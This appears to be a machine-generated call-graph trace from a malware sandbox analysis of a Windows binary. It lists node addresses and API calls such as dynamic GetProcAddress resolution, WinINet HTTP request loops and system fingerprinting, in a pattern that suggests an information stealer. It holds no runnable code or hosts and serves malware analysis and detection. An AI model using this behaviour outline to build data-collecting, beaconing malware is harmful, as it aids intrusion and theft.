14405->14406 14407 3845c0 2 API calls 14406->14407 14408 3841f3 14407->14408 14409 3845c0 2 API calls 14408->14409 14410 38420c 14409->14410 14411 3845c0 2 API calls 14410->14411 14412 384225 14411->14412 14413 3845c0 2 API calls 14412->14413 14414 38423e 14413->14414 14415 3845c0 2 API calls 14414->14415 14416 384257 14415->14416 14417 3845c0 2 API calls 14416->14417 14418 384270 14417->14418 14419 3845c0 2 API calls 14418->14419 14420 384289 14419->14420 14421 3845c0 2 API calls 14420->14421 14422 3842a2 14421->14422 14423 3845c0 2 API calls 14422->14423 14424 3842bb 14423->14424 14425 3845c0 2 API calls 14424->14425 14426 3842d4 14425->14426 14427 3845c0 2 API calls 14426->14427 14428 3842ed 14427->14428 14429 3845c0 2 API calls 14428->14429 14430 384306 14429->14430 14431 3845c0 2 API calls 14430->14431 14432 38431f 14431->14432 14433 3845c0 2 API calls 14432->14433 14434 384338 14433->14434 14435 3845c0 2 API calls 14434->14435 14436 384351 14435->14436 14437 3845c0 2 API calls 14436->14437 14438 38436a 14437->14438 14439 3845c0 2 API calls 14438->14439 14440 384383 14439->14440 14441 3845c0 2 API calls 14440->14441 14442 38439c 14441->14442 14443 3845c0 2 API calls 14442->14443 14444 3843b5 14443->14444 14445 3845c0 2 API calls 14444->14445 14446 3843ce 14445->14446 14447 3845c0 2 API calls 14446->14447 14448 3843e7 14447->14448 14449 3845c0 2 API calls 14448->14449 14450 384400 14449->14450 14451 3845c0 2 API calls 14450->14451 14452 384419 14451->14452 14453 3845c0 2 API calls 14452->14453 14454 384432 14453->14454 14455 3845c0 2 API calls 14454->14455 14456 38444b 14455->14456 14457 3845c0 2 API calls 14456->14457 14458 384464 14457->14458 14459 3845c0 2 API calls 14458->14459 14460 38447d 14459->14460 14461 3845c0 2 API calls 14460->14461 14462 384496 14461->14462 14463 3845c0 2 API calls 14462->14463 14464 3844af 14463->14464 14465 3845c0 2 API calls 14464->14465 14466 3844c8 14465->14466 14467 3845c0 2 API calls 14466->14467 14468 3844e1 14467->14468 14469 3845c0 2 API calls 14468->14469 14470 3844fa 14469->14470 14471 3845c0 2 API calls 14470->14471 14472 384513 14471->14472 14473 3845c0 2 API calls 14472->14473 14474 38452c 14473->14474 14475 3845c0 2 API calls 14474->14475 14476 384545 14475->14476 14477 3845c0 2 API calls 14476->14477 14478 38455e 14477->14478 14479 3845c0 2 API calls 14478->14479 14480 384577 14479->14480 14481 3845c0 2 API calls 14480->14481 14482 384590 14481->14482 14483 3845c0 2 API calls 14482->14483 14484 3845a9 14483->14484 14485 399c10 14484->14485 14486 399c20 43 API calls 14485->14486 14487 39a036 8 API calls 14485->14487 14486->14487 14488 39a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14487->14488 14489 39a146 14487->14489 14488->14489 14490 39a153 8 API calls 14489->14490 14491 39a216 14489->14491 14490->14491 14492 39a298 14491->14492 14493 39a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14491->14493 14494 39a2a5 6 API calls 14492->14494 14495 39a337 14492->14495 14493->14492 14494->14495 14496 39a41f 14495->14496 14497 39a344 9 API calls 14495->14497 14498 39a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14496->14498 14499 39a4a2 14496->14499 14497->14496 14498->14499 14500 39a4ab GetProcAddress GetProcAddress 14499->14500 14501 39a4dc 14499->14501 14500->14501 14502 39a515 14501->14502 14503 39a4e5 GetProcAddress GetProcAddress 14501->14503 14504 39a612 14502->14504 14505 39a522 10 API calls 14502->14505 14503->14502 14506 39a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14504->14506 14507 39a67d 14504->14507 14505->14504 14506->14507 14508 39a69e 14507->14508 14509 39a686 GetProcAddress 14507->14509 14510 395ca3 14508->14510 14511 39a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14508->14511 14509->14508 14512 381590 14510->14512 14511->14510 15634 381670 14512->15634 14515 39a7a0 lstrcpy 14516 3815b5 14515->14516 14517 39a7a0 lstrcpy 14516->14517 14518 3815c7 14517->14518 14519 39a7a0 lstrcpy 14518->14519 14520 3815d9 14519->14520 14521 39a7a0 lstrcpy 14520->14521 14522 381663 14521->14522 14523 395510 14522->14523 14524 395521 14523->14524 14525 39a820 2 API calls 14524->14525 14526 39552e 14525->14526 14527 39a820 2 API calls 14526->14527 14528 39553b 14527->14528 14529 39a820 2 API calls 14528->14529 14530 395548 14529->14530 14531 39a740 lstrcpy 14530->14531 14532 395555 14531->14532 14533 39a740 lstrcpy 14532->14533 14534 395562 14533->14534 14535 39a740 lstrcpy 14534->14535 14536 39556f 14535->14536 14537 39a740 lstrcpy 14536->14537 14543 39557c 14537->14543 14538 39a740 lstrcpy 14538->14543 14539 395643 StrCmpCA 14539->14543 14540 3956a0 StrCmpCA 14541 3957dc 14540->14541 14540->14543 14542 39a8a0 lstrcpy 14541->14542 14544 3957e8 14542->14544 14543->14538 14543->14539 14543->14540 14546 39a820 lstrlen lstrcpy 14543->14546 14548 395856 StrCmpCA 14543->14548 14549 3951f0 20 API calls 14543->14549 14558 395a0b StrCmpCA 14543->14558 14559 3952c0 25 API calls 14543->14559 14571 39a8a0 lstrcpy 14543->14571 14572 39578a StrCmpCA 14543->14572 14574 39a7a0 lstrcpy 14543->14574 14575 39593f StrCmpCA 14543->14575 14576 381590 lstrcpy 14543->14576 14545 39a820 2 API calls 14544->14545 14547 3957f6 14545->14547 14546->14543 14550 39a820 2 API calls 14547->14550 14548->14543 14551 395991 14548->14551 14549->14543 14553 395805 14550->14553 14552 39a8a0 lstrcpy 14551->14552 14554 39599d 14552->14554 14555 381670 lstrcpy 14553->14555 14556 39a820 2 API calls 14554->14556 14577 395811 14555->14577 14557 3959ab 14556->14557 14560 39a820 2 API calls 14557->14560 14561 395a28 14558->14561 14562 395a16 Sleep 14558->14562 14559->14543 14563 3959ba 14560->14563 14564 39a8a0 lstrcpy 14561->14564 14562->14543 14565 381670 lstrcpy 14563->14565 14566 395a34 14564->14566 14565->14577 14567 39a820 2 API calls 14566->14567 14568 395a43 14567->14568 14569 39a820 2 API calls 14568->14569 14570 395a52 14569->14570 14573 381670 lstrcpy 14570->14573 14571->14543 14572->14543 14573->14577 14574->14543 14575->14543 14576->14543 14577->13630 14579 39754c 14578->14579 14580 397553 GetVolumeInformationA 14578->14580 14579->14580 14581 397591 14580->14581 14582 3975fc GetProcessHeap RtlAllocateHeap 14581->14582 14583 397619 14582->14583 14584 397628 wsprintfA 14582->14584 14585 39a740 lstrcpy 14583->14585 14586 39a740 lstrcpy 14584->14586 14587 395da7 14585->14587 14586->14587 14587->13651 14589 39a7a0 lstrcpy 14588->14589 14590 384899 14589->14590 15643 3847b0 14590->15643 14592 3848a5 14593 39a740 lstrcpy 14592->14593 14594 3848d7 14593->14594 14595 39a740 lstrcpy 14594->14595 14596 3848e4 14595->14596 14597 39a740 lstrcpy 14596->14597 14598 3848f1 14597->14598 14599 39a740 lstrcpy 14598->14599 14600 3848fe 14599->14600 14601 39a740 lstrcpy 14600->14601 14602 38490b InternetOpenA StrCmpCA 14601->14602 14603 384944 14602->14603 14604 384ecb InternetCloseHandle 14603->14604 14605 384955 14603->14605 14607 384ee8 14604->14607 15654 398b60 14605->15654 15649 389ac0 CryptStringToBinaryA 14607->15649 14608 384963 15662 39a920 14608->15662 14611 384976 14613 39a8a0 lstrcpy 14611->14613 14619 38497f 14613->14619 14614 39a820 2 API calls 14615 384f05 14614->14615 14617 39a9b0 4 API calls 14615->14617 14616 384f27 codecvt 14621 39a7a0 lstrcpy 14616->14621 14618 384f1b 14617->14618 14620 39a8a0 lstrcpy 14618->14620 14622 39a9b0 4 API calls 14619->14622 14620->14616 14633 384f57 14621->14633 14623 3849a9 14622->14623 14624 39a8a0 lstrcpy 14623->14624 14625 3849b2 14624->14625 14626 39a9b0 4 API calls 14625->14626 14627 3849d1 14626->14627 14628 39a8a0 lstrcpy 14627->14628 14629 3849da 14628->14629 14630 39a920 3 API calls 14629->14630 14631 3849f8 14630->14631 14632 39a8a0 lstrcpy 14631->14632 14634 384a01 14632->14634 14633->13654 14635 39a9b0 4 API calls 14634->14635 14636 384a20 14635->14636 14637 39a8a0 lstrcpy 14636->14637 14638 384a29 14637->14638 14639 39a9b0 4 API calls 14638->14639 14640 384a48 14639->14640 14641 39a8a0 lstrcpy 14640->14641 14642 384a51 14641->14642 14643 39a9b0 4 API calls 14642->14643 14644 384a7d 14643->14644 14645 39a920 3 API calls 14644->14645 14646 384a84 14645->14646 14647 39a8a0 lstrcpy 14646->14647 14648 384a8d 14647->14648 14649 384aa3 InternetConnectA 14648->14649 14649->14604 14650 384ad3 HttpOpenRequestA 14649->14650 14652 384b28 14650->14652 14653 384ebe InternetCloseHandle 14650->14653 14654 39a9b0 4 API calls 14652->14654 14653->14604 14655 384b3c 14654->14655 14656 39a8a0 lstrcpy 14655->14656 14657 384b45 14656->14657 14658 39a920 3 API calls 14657->14658 14659 384b63 14658->14659 14660 39a8a0 lstrcpy 14659->14660 14661 384b6c 14660->14661 14662 39a9b0 4 API calls 14661->14662 14663 384b8b 14662->14663 14664 39a8a0 lstrcpy 14663->14664 14665 384b94 14664->14665 14666 39a9b0 4 API calls 14665->14666 14667 384bb5 14666->14667 14668 39a8a0 lstrcpy 14667->14668 14669 384bbe 14668->14669 14670 39a9b0 4 API calls 14669->14670 14671 384bde 14670->14671 14672 39a8a0 lstrcpy 14671->14672 14673 384be7 14672->14673 14674 39a9b0 4 API calls 14673->14674 14675 384c06 14674->14675 14676 39a8a0 lstrcpy 14675->14676 14677 384c0f 14676->14677 14678 39a920 3 API calls 14677->14678 14679 384c2d 14678->14679 14680 39a8a0 lstrcpy 14679->14680 14681 384c36 14680->14681 14682 39a9b0 4 API calls 14681->14682 14683 384c55 14682->14683 14684 39a8a0 lstrcpy 14683->14684 14685 384c5e 14684->14685 14686 39a9b0 4 API calls 14685->14686 14687 384c7d 14686->14687 14688 39a8a0 lstrcpy 14687->14688 14689 384c86 14688->14689 14690 39a920 3 API calls 14689->14690 14691 384ca4 14690->14691 14692 39a8a0 lstrcpy 14691->14692 14693 384cad 14692->14693 14694 39a9b0 4 API calls 14693->14694 14695 384ccc 14694->14695 14696 39a8a0 lstrcpy 14695->14696 14697 384cd5 14696->14697 14698 39a9b0 4 API calls 14697->14698 14699 384cf6 14698->14699 14700 39a8a0 lstrcpy 14699->14700 14701 384cff 14700->14701 14702 39a9b0 4 API calls 14701->14702 14703 384d1f 14702->14703 14704 39a8a0 lstrcpy 14703->14704 14705 384d28 14704->14705 14706 39a9b0 4 API calls 14705->14706 14707 384d47 14706->14707 14708 39a8a0 lstrcpy 14707->14708 14709 384d50 14708->14709 14710 39a920 3 API calls 14709->14710 14711 384d6e 14710->14711 14712 39a8a0 lstrcpy 14711->14712 14713 384d77 14712->14713 14714 39a740 lstrcpy 14713->14714 14715 384d92 14714->14715 14716 39a920 3 API calls 14715->14716 14717 384db3 14716->14717 14718 39a920 3 API calls 14717->14718 14719 384dba 14718->14719 14720 39a8a0 lstrcpy 14719->14720 14721 384dc6 14720->14721 14722 384de7 lstrlen 14721->14722 14723 384dfa 14722->14723 14724 384e03 lstrlen 14723->14724 15668 39aad0 14724->15668 14726 384e13 HttpSendRequestA 14727 384e32 InternetReadFile 14726->14727 14728 384e67 InternetCloseHandle 14727->14728 14733 384e5e 14727->14733 14730 39a800 14728->14730 14730->14653 14731 39a9b0 4 API calls 14731->14733 14732 39a8a0 lstrcpy 14732->14733 14733->14727 14733->14728 14733->14731 14733->14732 15670 39aad0 14734->15670 14736 3917c4 StrCmpCA 14737 3917cf ExitProcess 14736->14737 14748 3917d7 14736->14748 14738 3919c2 14738->13656 14739 39185d StrCmpCA 14739->14748 14740 39187f StrCmpCA 14740->14748 14741 3918f1 StrCmpCA 14741->14748 14742 391951 StrCmpCA 14742->14748 14743 391970 StrCmpCA 14743->14748 14744 391913 StrCmpCA 14744->14748 14745 391932 StrCmpCA 14745->14748 14746 3918ad StrCmpCA 14746->14748 14747 3918cf StrCmpCA 14747->14748 14748->14738 14748->14739 14748->14740 14748->14741 14748->14742 14748->14743 14748->14744 14748->14745 14748->14746 14748->14747 14749 39a820 lstrlen lstrcpy 14748->14749 14749->14748 14751 39a7a0 lstrcpy 14750->14751 14752 385979 14751->14752 14753 3847b0 2 API calls 14752->14753 14754 385985 14753->14754 14755 39a740 lstrcpy 14754->14755 14756 3859ba 14755->14756 14757 39a740 lstrcpy 14756->14757 14758 3859c7 14757->14758 14759 39a740 lstrcpy 14758->14759 14760 3859d4 14759->14760 14761 39a740 lstrcpy 14760->14761 14762 3859e1 14761->14762 14763 39a740 lstrcpy 14762->14763 14764 3859ee InternetOpenA StrCmpCA 14763->14764 14765 385a1d 14764->14765 14766 385fc3 InternetCloseHandle 14765->14766 14767 398b60 3 API calls 14765->14767 14768 385fe0 14766->14768 14769 385a3c 14767->14769 14771 389ac0 4 API calls 14768->14771 14770 39a920 3 API calls 14769->14770 14772 385a4f 14770->14772 14773 385fe6 14771->14773 14774 39a8a0 lstrcpy 14772->14774 14775 39a820 2 API calls 14773->14775 14778 38601f codecvt 14773->14778 14780 385a58 14774->14780 14776 385ffd 14775->14776 14777 39a9b0 4 API calls 14776->14777 14779 386013 14777->14779 14782 39a7a0 lstrcpy 14778->14782 14781 39a8a0 lstrcpy 14779->14781 14783 39a9b0 4 API calls 14780->14783 14781->14778 14791 38604f 14782->14791 14784 385a82 14783->14784 14785 39a8a0 lstrcpy 14784->14785 14786 385a8b 14785->14786 14787 39a9b0 4 API calls 14786->14787 14788 385aaa 14787->14788 14789 39a8a0 lstrcpy 14788->14789 14790 385ab3 14789->14790 14792 39a920 3 API calls 14790->14792 14791->13662 14793 385ad1 14792->14793 14794 39a8a0 lstrcpy 14793->14794 14795 385ada 14794->14795 14796 39a9b0 4 API calls 14795->14796 14797 385af9 14796->14797 14798 39a8a0 lstrcpy 14797->14798 14799 385b02 14798->14799 14800 39a9b0 4 API calls 14799->14800 14801 385b21 14800->14801 14802 39a8a0 lstrcpy 14801->14802 14803 385b2a 14802->14803 14804 39a9b0 4 API calls 14803->14804 14805 385b56 14804->14805 14806 39a920 3 API calls 14805->14806 14807 385b5d 14806->14807 14808 39a8a0 lstrcpy 14807->14808 14809 385b66 14808->14809 14810 385b7c InternetConnectA 14809->14810 14810->14766 14811 385bac HttpOpenRequestA 14810->14811 14813 385c0b 14811->14813 14814 385fb6 InternetCloseHandle 14811->14814 14815 39a9b0 4 API calls 14813->14815 14814->14766 14816 385c1f 14815->14816 14817 39a8a0 lstrcpy 14816->14817 14818 385c28 14817->14818 14819 39a920 3 API calls 14818->14819 14820 385c46 14819->14820 14821 39a8a0 lstrcpy 14820->14821 14822 385c4f 14821->14822 14823 39a9b0 4 API calls 14822->14823 14824 385c6e 14823->14824 14825 39a8a0 lstrcpy 14824->14825 14826 385c77 14825->14826 14827 39a9b0 4 API calls 14826->14827 14828 385c98 14827->14828 14829 39a8a0 lstrcpy 14828->14829 14830 385ca1 14829->14830 14831 39a9b0 4 API calls 14830->14831 14832 385cc1 14831->14832 14833 39a8a0 lstrcpy 14832->14833 14834 385cca 14833->14834 14835 39a9b0 4 API calls 14834->14835 14836 385ce9 14835->14836 14837 39a8a0 lstrcpy 14836->14837 14838 385cf2 14837->14838 14839 39a920 3 API calls 14838->14839 14840 385d10 14839->14840 14841 39a8a0 lstrcpy 14840->14841 14842 385d19 14841->14842 14843 39a9b0 4 API calls 14842->14843 14844 385d38 14843->14844 14845 39a8a0 lstrcpy 14844->14845 14846 385d41 14845->14846 14847 39a9b0 4 API calls 14846->14847 14848 385d60 14847->14848 14849 39a8a0 lstrcpy 14848->14849 14850 385d69 14849->14850 14851 39a920 3 API calls 14850->14851 14852 385d87 14851->14852 14853 39a8a0 lstrcpy 14852->14853 14854 385d90 14853->14854 14855 39a9b0 4 API calls 14854->14855 14856 385daf 14855->14856 14857 39a8a0 lstrcpy 14856->14857 14858 385db8 14857->14858 14859 39a9b0 4 API calls 14858->14859 14860 385dd9 14859->14860 14861 39a8a0 lstrcpy 14860->14861 14862 385de2 14861->14862 14863 39a9b0 4 API calls 14862->14863 14864 385e02 14863->14864 14865 39a8a0 lstrcpy 14864->14865 14866 385e0b 14865->14866 14867 39a9b0 4 API calls 14866->14867 14868 385e2a 14867->14868 14869 39a8a0 lstrcpy 14868->14869 14870 385e33 14869->14870 14871 39a920 3 API calls 14870->14871 14872 385e54 14871->14872 14873 39a8a0 lstrcpy 14872->14873 14874 385e5d 14873->14874 14875 385e70 lstrlen 14874->14875 15671 39aad0 14875->15671 14877 385e81 lstrlen GetProcessHeap RtlAllocateHeap 15672 39aad0 14877->15672 14879 385eae lstrlen 14880 385ebe 14879->14880 14881 385ed7 lstrlen 14880->14881 14882 385ee7 14881->14882 14883 385ef0 lstrlen 14882->14883 14884 385f04 14883->14884 14885 385f1a lstrlen 14884->14885 15673 39aad0 14885->15673 14887 385f2a HttpSendRequestA 14888 385f35 InternetReadFile 14887->14888 14889 385f6a InternetCloseHandle 14888->14889 14893 385f61 14888->14893 14889->14814 14891 39a9b0 4 API calls 14891->14893 14892 39a8a0 lstrcpy 14892->14893 14893->14888 14893->14889 14893->14891 14893->14892 14896 391077 14894->14896 14895 391151 14895->13664 14896->14895 14897 39a820 lstrlen lstrcpy 14896->14897 14897->14896 14900 390db7 14898->14900 14899 390f17 14899->13672 14900->14899 14901 390ea4 StrCmpCA 14900->14901 14902 390e27 StrCmpCA 14900->14902 14903 390e67 StrCmpCA 14900->14903 14904 39a820 lstrlen lstrcpy 14900->14904 14901->14900 14902->14900 14903->14900 14904->14900 14909 390f67 14905->14909 14906 391044 14906->13680 14907 390fb2 StrCmpCA 14907->14909 14908 39a820 lstrlen lstrcpy 14908->14909 14909->14906 14909->14907 14909->14908 14911 39a740 lstrcpy 14910->14911 14912 391a26 14911->14912 14913 39a9b0 4 API calls 14912->14913 14914 391a37 14913->14914 14915 39a8a0 lstrcpy 14914->14915 14916 391a40 14915->14916 14917 39a9b0 4 API calls 14916->14917 14918 391a5b 14917->14918 14919 39a8a0 lstrcpy 14918->14919 14920 391a64 14919->14920 14921 39a9b0 4 API calls 14920->14921 14922 391a7d 14921->14922 14923 39a8a0 lstrcpy 14922->14923 14924 391a86 14923->14924 14925 39a9b0 4 API calls 14924->14925 14926 391aa1 14925->14926 14927 39a8a0 lstrcpy 14926->14927 14928 391aaa 14927->14928 14929 39a9b0 4 API calls 14928->14929 14930 391ac3 14929->14930 14931 39a8a0 lstrcpy 14930->14931 14932 391acc 14931->14932 14933 39a9b0 4 API calls 14932->14933 14934 391ae7 14933->14934 14935 39a8a0 lstrcpy 14934->14935 14936 391af0 14935->14936 14937 39a9b0 4 API calls 14936->14937 14938 391b09 14937->14938 14939 39a8a0 lstrcpy 14938->14939 14940 391b12 14939->14940 14941 39a9b0 4 API calls 14940->14941 14942 391b2d 14941->14942 14943 39a8a0 lstrcpy 14942->14943 14944 391b36 14943->14944 14945 39a9b0 4 API calls 14944->14945 14946 391b4f 14945->14946 14947 39a8a0 lstrcpy 14946->14947 14948 391b58 14947->14948 14949 39a9b0 4 API calls 14948->14949 14950 391b76 14949->14950 14951 39a8a0 lstrcpy 14950->14951 14952 391b7f 14951->14952 14953 397500 6 API calls 14952->14953 14954 391b96 14953->14954 14955 39a920 3 API calls 14954->14955 14956 391ba9 14955->14956 14957 39a8a0 lstrcpy 14956->14957 14958 391bb2 14957->14958 14959 39a9b0 4 API calls 14958->14959 14960 391bdc 14959->14960 14961 39a8a0 lstrcpy 14960->14961 14962 391be5 14961->14962 14963 39a9b0 4 API calls 14962->14963 14964 391c05 14963->14964 14965 39a8a0 lstrcpy 14964->14965 14966 391c0e 14965->14966 15674 397690 GetProcessHeap RtlAllocateHeap 14966->15674 14969 39a9b0 4 API calls 14970 391c2e 14969->14970 14971 39a8a0 lstrcpy 14970->14971 14972 391c37 14971->14972 14973 39a9b0 4 API calls 14972->14973 14974 391c56 14973->14974 14975 39a8a0 lstrcpy 14974->14975 14976 391c5f 14975->14976 14977 39a9b0 4 API calls 14976->14977 14978 391c80 14977->14978 14979 39a8a0 lstrcpy 14978->14979 14980 391c89 14979->14980 15681 3977c0 GetCurrentProcess IsWow64Process 14980->15681 14983 39a9b0 4 API calls 14984 391ca9 14983->14984 14985 39a8a0 lstrcpy 14984->14985 14986 391cb2 14985->14986 14987 39a9b0 4 API calls 14986->14987 14988 391cd1 14987->14988 14989 39a8a0 lstrcpy 14988->14989 14990 391cda 14989->14990 14991 39a9b0 4 API calls 14990->14991 14992 391cfb 14991->14992 14993 39a8a0 lstrcpy 14992->14993 14994 391d04 14993->14994 14995 397850 3 API calls 14994->14995 14996 391d14 14995->14996 14997 39a9b0 4 API calls 14996->14997 14998 391d24 14997->14998 14999 39a8a0 lstrcpy 14998->14999 15000 391d2d 14999->15000 15001 39a9b0 4 API calls 15000->15001 15002 391d4c 15001->15002 15003 39a8a0 lstrcpy 15002->15003 15004 391d55 15003->15004 15005 39a9b0 4 API calls 15004->15005 15006 391d75 15005->15006 15007 39a8a0 lstrcpy 15006->15007 15008 391d7e 15007->15008 15009 3978e0 3 API calls 15008->15009 15010 391d8e 15009->15010 15011 39a9b0 4 API calls 15010->15011 15012 391d9e 15011->15012 15013 39a8a0 lstrcpy 15012->15013 15014 391da7 15013->15014 15015 39a9b0 4 API calls 15014->15015 15016 391dc6 15015->15016 15017 39a8a0 lstrcpy 15016->15017 15018 391dcf 15017->15018 15019 39a9b0 4 API calls 15018->15019 15020 391df0 15019->15020 15021 39a8a0 lstrcpy 15020->15021 15022 391df9 15021->15022 15683 397980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15022->15683 15025 39a9b0 4 API calls 15026 391e19 15025->15026 15027 39a8a0 lstrcpy 15026->15027 15028 391e22 15027->15028 15029 39a9b0 4 API calls 15028->15029 15030 391e41 15029->15030 15031 39a8a0 lstrcpy 15030->15031 15032 391e4a 15031->15032 15033 39a9b0 4 API calls 15032->15033 15034 391e6b 15033->15034 15035 39a8a0 lstrcpy 15034->15035 15036 391e74 15035->15036 15685 397a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15036->15685 15039 39a9b0 4 API calls 15040 391e94 15039->15040 15041 39a8a0 lstrcpy 15040->15041 15042 391e9d 15041->15042 15043 39a9b0 4 API calls 15042->15043 15044 391ebc 15043->15044 15045 39a8a0 lstrcpy 15044->15045 15046 391ec5 15045->15046 15047 39a9b0 4 API calls 15046->15047 15048 391ee5 15047->15048 15049 39a8a0 lstrcpy 15048->15049 15050 391eee 15049->15050 15688 397b00 GetUserDefaultLocaleName 15050->15688 15053 39a9b0 4 API calls 15054 391f0e 15053->15054 15055 39a8a0 lstrcpy 15054->15055 15056 391f17 15055->15056 15057 39a9b0 4 API calls 15056->15057 15058 391f36 15057->15058 15059 39a8a0 lstrcpy 15058->15059 15060 391f3f 15059->15060 15061 39a9b0 4 API calls 15060->15061 15062 391f60 15061->15062 15063 39a8a0 lstrcpy 15062->15063 15064 391f69 15063->15064 15692 397b90 15064->15692 15066 391f80 15067 39a920 3 API calls 15066->15067 15068 391f93 15067->15068 15069 39a8a0 lstrcpy 15068->15069 15070 391f9c 15069->15070 15071 39a9b0 4 API calls 15070->15071 15072 391fc6 15071->15072 15073 39a8a0 lstrcpy 15072->15073 15074 391fcf 15073->15074 15075 39a9b0 4 API calls 15074->15075 15076 391fef 15075->15076 15077 39a8a0 lstrcpy 15076->15077 15078 391ff8 15077->15078 15704 397d80 GetSystemPowerStatus 15078->15704 15081 39a9b0 4 API calls 15082 392018 15081->15082 15083 39a8a0 lstrcpy 15082->15083 15084 392021 15083->15084 15085 39a9b0 4 API calls 15084->15085 15086 392040 15085->15086 15087 39a8a0 lstrcpy 15086->15087 15088 392049 15087->15088 15089 39a9b0 4 API calls 15088->15089 15090 39206a 15089->15090 15091 39a8a0 lstrcpy 15090->15091 15092 392073 15091->15092 15093 39207e GetCurrentProcessId 15092->15093 15706 399470 OpenProcess 15093->15706 15096 39a920 3 API calls 15097 3920a4 15096->15097 15098 39a8a0 lstrcpy 15097->15098 15099 3920ad 15098->15099 15100 39a9b0 4 API calls 15099->15100 15101 3920d7 15100->15101 15102 39a8a0 lstrcpy 15101->15102 15103 3920e0 15102->15103 15104 39a9b0 4 API calls 15103->15104 15105 392100 15104->15105 15106 39a8a0 lstrcpy 15105->15106 15107 392109 15106->15107 15711 397e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15107->15711 15110 39a9b0 4 API calls 15111 392129 15110->15111 15112 39a8a0 lstrcpy 15111->15112 15113 392132 15112->15113 15114 39a9b0 4 API calls 15113->15114 15115 392151 15114->15115 15116 39a8a0 lstrcpy 15115->15116 15117 39215a 15116->15117 15118 39a9b0 4 API calls 15117->15118 15119 39217b 15118->15119 15120 39a8a0 lstrcpy 15119->15120 15121 392184 15120->15121 15715 397f60 15121->15715 15124 39a9b0 4 API calls 15125 3921a4 15124->15125 15126 39a8a0 lstrcpy 15125->15126 15127 3921ad 15126->15127 15128 39a9b0 4 API calls 15127->15128 15129 3921cc 15128->15129 15130 39a8a0 lstrcpy 15129->15130 15131 3921d5 15130->15131 15132 39a9b0 4 API calls 15131->15132 15133 3921f6 15132->15133 15134 39a8a0 lstrcpy 15133->15134 15135 3921ff 15134->15135 15728 397ed0 GetSystemInfo wsprintfA 15135->15728 15138 39a9b0 4 API calls 15139 39221f 15138->15139 15140 39a8a0 lstrcpy 15139->15140 15141 392228 15140->15141 15142 39a9b0 4 API calls 15141->15142 15143 392247 15142->15143 15144 39a8a0 lstrcpy 15143->15144 15145 392250 15144->15145 15146 39a9b0 4 API calls 15145->15146 15147 392270 15146->15147 15148 39a8a0 lstrcpy 15147->15148 15149 392279 15148->15149 15730 398100 GetProcessHeap RtlAllocateHeap 15149->15730 15152 39a9b0 4 API calls 15153 392299 15152->15153 15154 39a8a0 lstrcpy 15153->15154 15155 3922a2 15154->15155 15156 39a9b0 4 API calls 15155->15156 15157 3922c1 15156->15157 15158 39a8a0 lstrcpy 15157->15158 15159 3922ca 15158->15159 15160 39a9b0 4 API calls 15159->15160 15161 3922eb 15160->15161 15162 39a8a0 lstrcpy 15161->15162 15163 3922f4 15162->15163 15736 3987c0 15163->15736 15166 39a920 3 API calls 15167 39231e 15166->15167 15168 39a8a0 lstrcpy 15167->15168 15169 392327 15168->15169 15170 39a9b0 4 API calls 15169->15170 15171 392351 15170->15171 15172 39a8a0 lstrcpy 15171->15172 15173 39235a 15172->15173 15174 39a9b0 4 API calls 15173->15174 15175 39237a 15174->15175 15176 39a8a0 lstrcpy 15175->15176 15177 392383 15176->15177 15178 39a9b0 4 API calls 15177->15178 15179 3923a2 15178->15179 15180 39a8a0 lstrcpy 15179->15180 15181 3923ab 15180->15181 15741 3981f0 15181->15741 15183 3923c2 15184 39a920 3 API calls 15183->15184 15185 3923d5 15184->15185 15186 39a8a0 lstrcpy 15185->15186 15187 3923de 15186->15187 15188 39a9b0 4 API calls 15187->15188 15189 39240a 15188->15189 15190 39a8a0 lstrcpy 15189->15190 15191 392413 15190->15191 15192 39a9b0 4 API calls 15191->15192 15193 392432 15192->15193 15194 39a8a0 lstrcpy 15193->15194 15195 39243b 15194->15195 15196 39a9b0 4 API calls 15195->15196 15197 39245c 15196->15197 15198 39a8a0 lstrcpy 15197->15198 15199 392465 15198->15199 15200 39a9b0 4 API calls 15199->15200 15201 392484 15200->15201 15202 39a8a0 lstrcpy 15201->15202 15203 39248d 15202->15203 15204 39a9b0 4 API calls 15203->15204 15205 3924ae 15204->15205 15206 39a8a0 lstrcpy 15205->15206 15207 3924b7 15206->15207 15749 398320 15207->15749 15209 3924d3 15210 39a920 3 API calls 15209->15210 15211 3924e6 15210->15211 15212 39a8a0 lstrcpy 15211->15212 15213 3924ef 15212->15213 15214 39a9b0 4 API calls 15213->15214 15215 392519 15214->15215 15216 39a8a0 lstrcpy 15215->15216 15217 392522 15216->15217 15218 39a9b0 4 API calls 15217->15218 15219 392543 15218->15219 15220 39a8a0 lstrcpy 15219->15220 15221 39254c 15220->15221 15222 398320 17 API calls 15221->15222 15223 392568 15222->15223 15224 39a920 3 API calls 15223->15224 15225 39257b 15224->15225 15226 39a8a0 lstrcpy 15225->15226 15227 392584 15226->15227 15228 39a9b0 4 API calls 15227->15228 15229 3925ae 15228->15229 15230 39a8a0 lstrcpy 15229->15230 15231 3925b7 15230->15231 15232 39a9b0 4 API calls 15231->15232 15233 3925d6 15232->15233 15234 39a8a0 lstrcpy 15233->15234 15235 3925df 15234->15235 15236 39a9b0 4 API calls 15235->15236 15237 392600 15236->15237 15238 39a8a0 lstrcpy 15237->15238 15239 392609 15238->15239 15785 398680 15239->15785 15241 392620 15242 39a920 3 API calls 15241->15242 15243 392633 15242->15243 15244 39a8a0 lstrcpy 15243->15244 15245 39263c 15244->15245 15246 39265a lstrlen 15245->15246 15247 39266a 15246->15247 15248 39a740 lstrcpy 15247->15248 15249 39267c 15248->15249 15250 381590 lstrcpy 15249->15250 15251 39268d 15250->15251 15795 395190 15251->15795 15253 392699 15253->13684 15983 39aad0 15254->15983 15256 385009 InternetOpenUrlA 15260 385021 15256->15260 15257 38502a InternetReadFile 15257->15260 15258 3850a0 InternetCloseHandle InternetCloseHandle 15259 3850ec 15258->15259 15259->13688 15260->15257 15260->15258 15984 3898d0 15261->15984 15263 390759 15264 390a38 15263->15264 15265 39077d 15263->15265 15266 381590 lstrcpy 15264->15266 15268 390799 StrCmpCA 15265->15268 15267 390a49 15266->15267 16160 390250 15267->16160 15270 390843 15268->15270 15271 3907a8 15268->15271 15275 390865 StrCmpCA 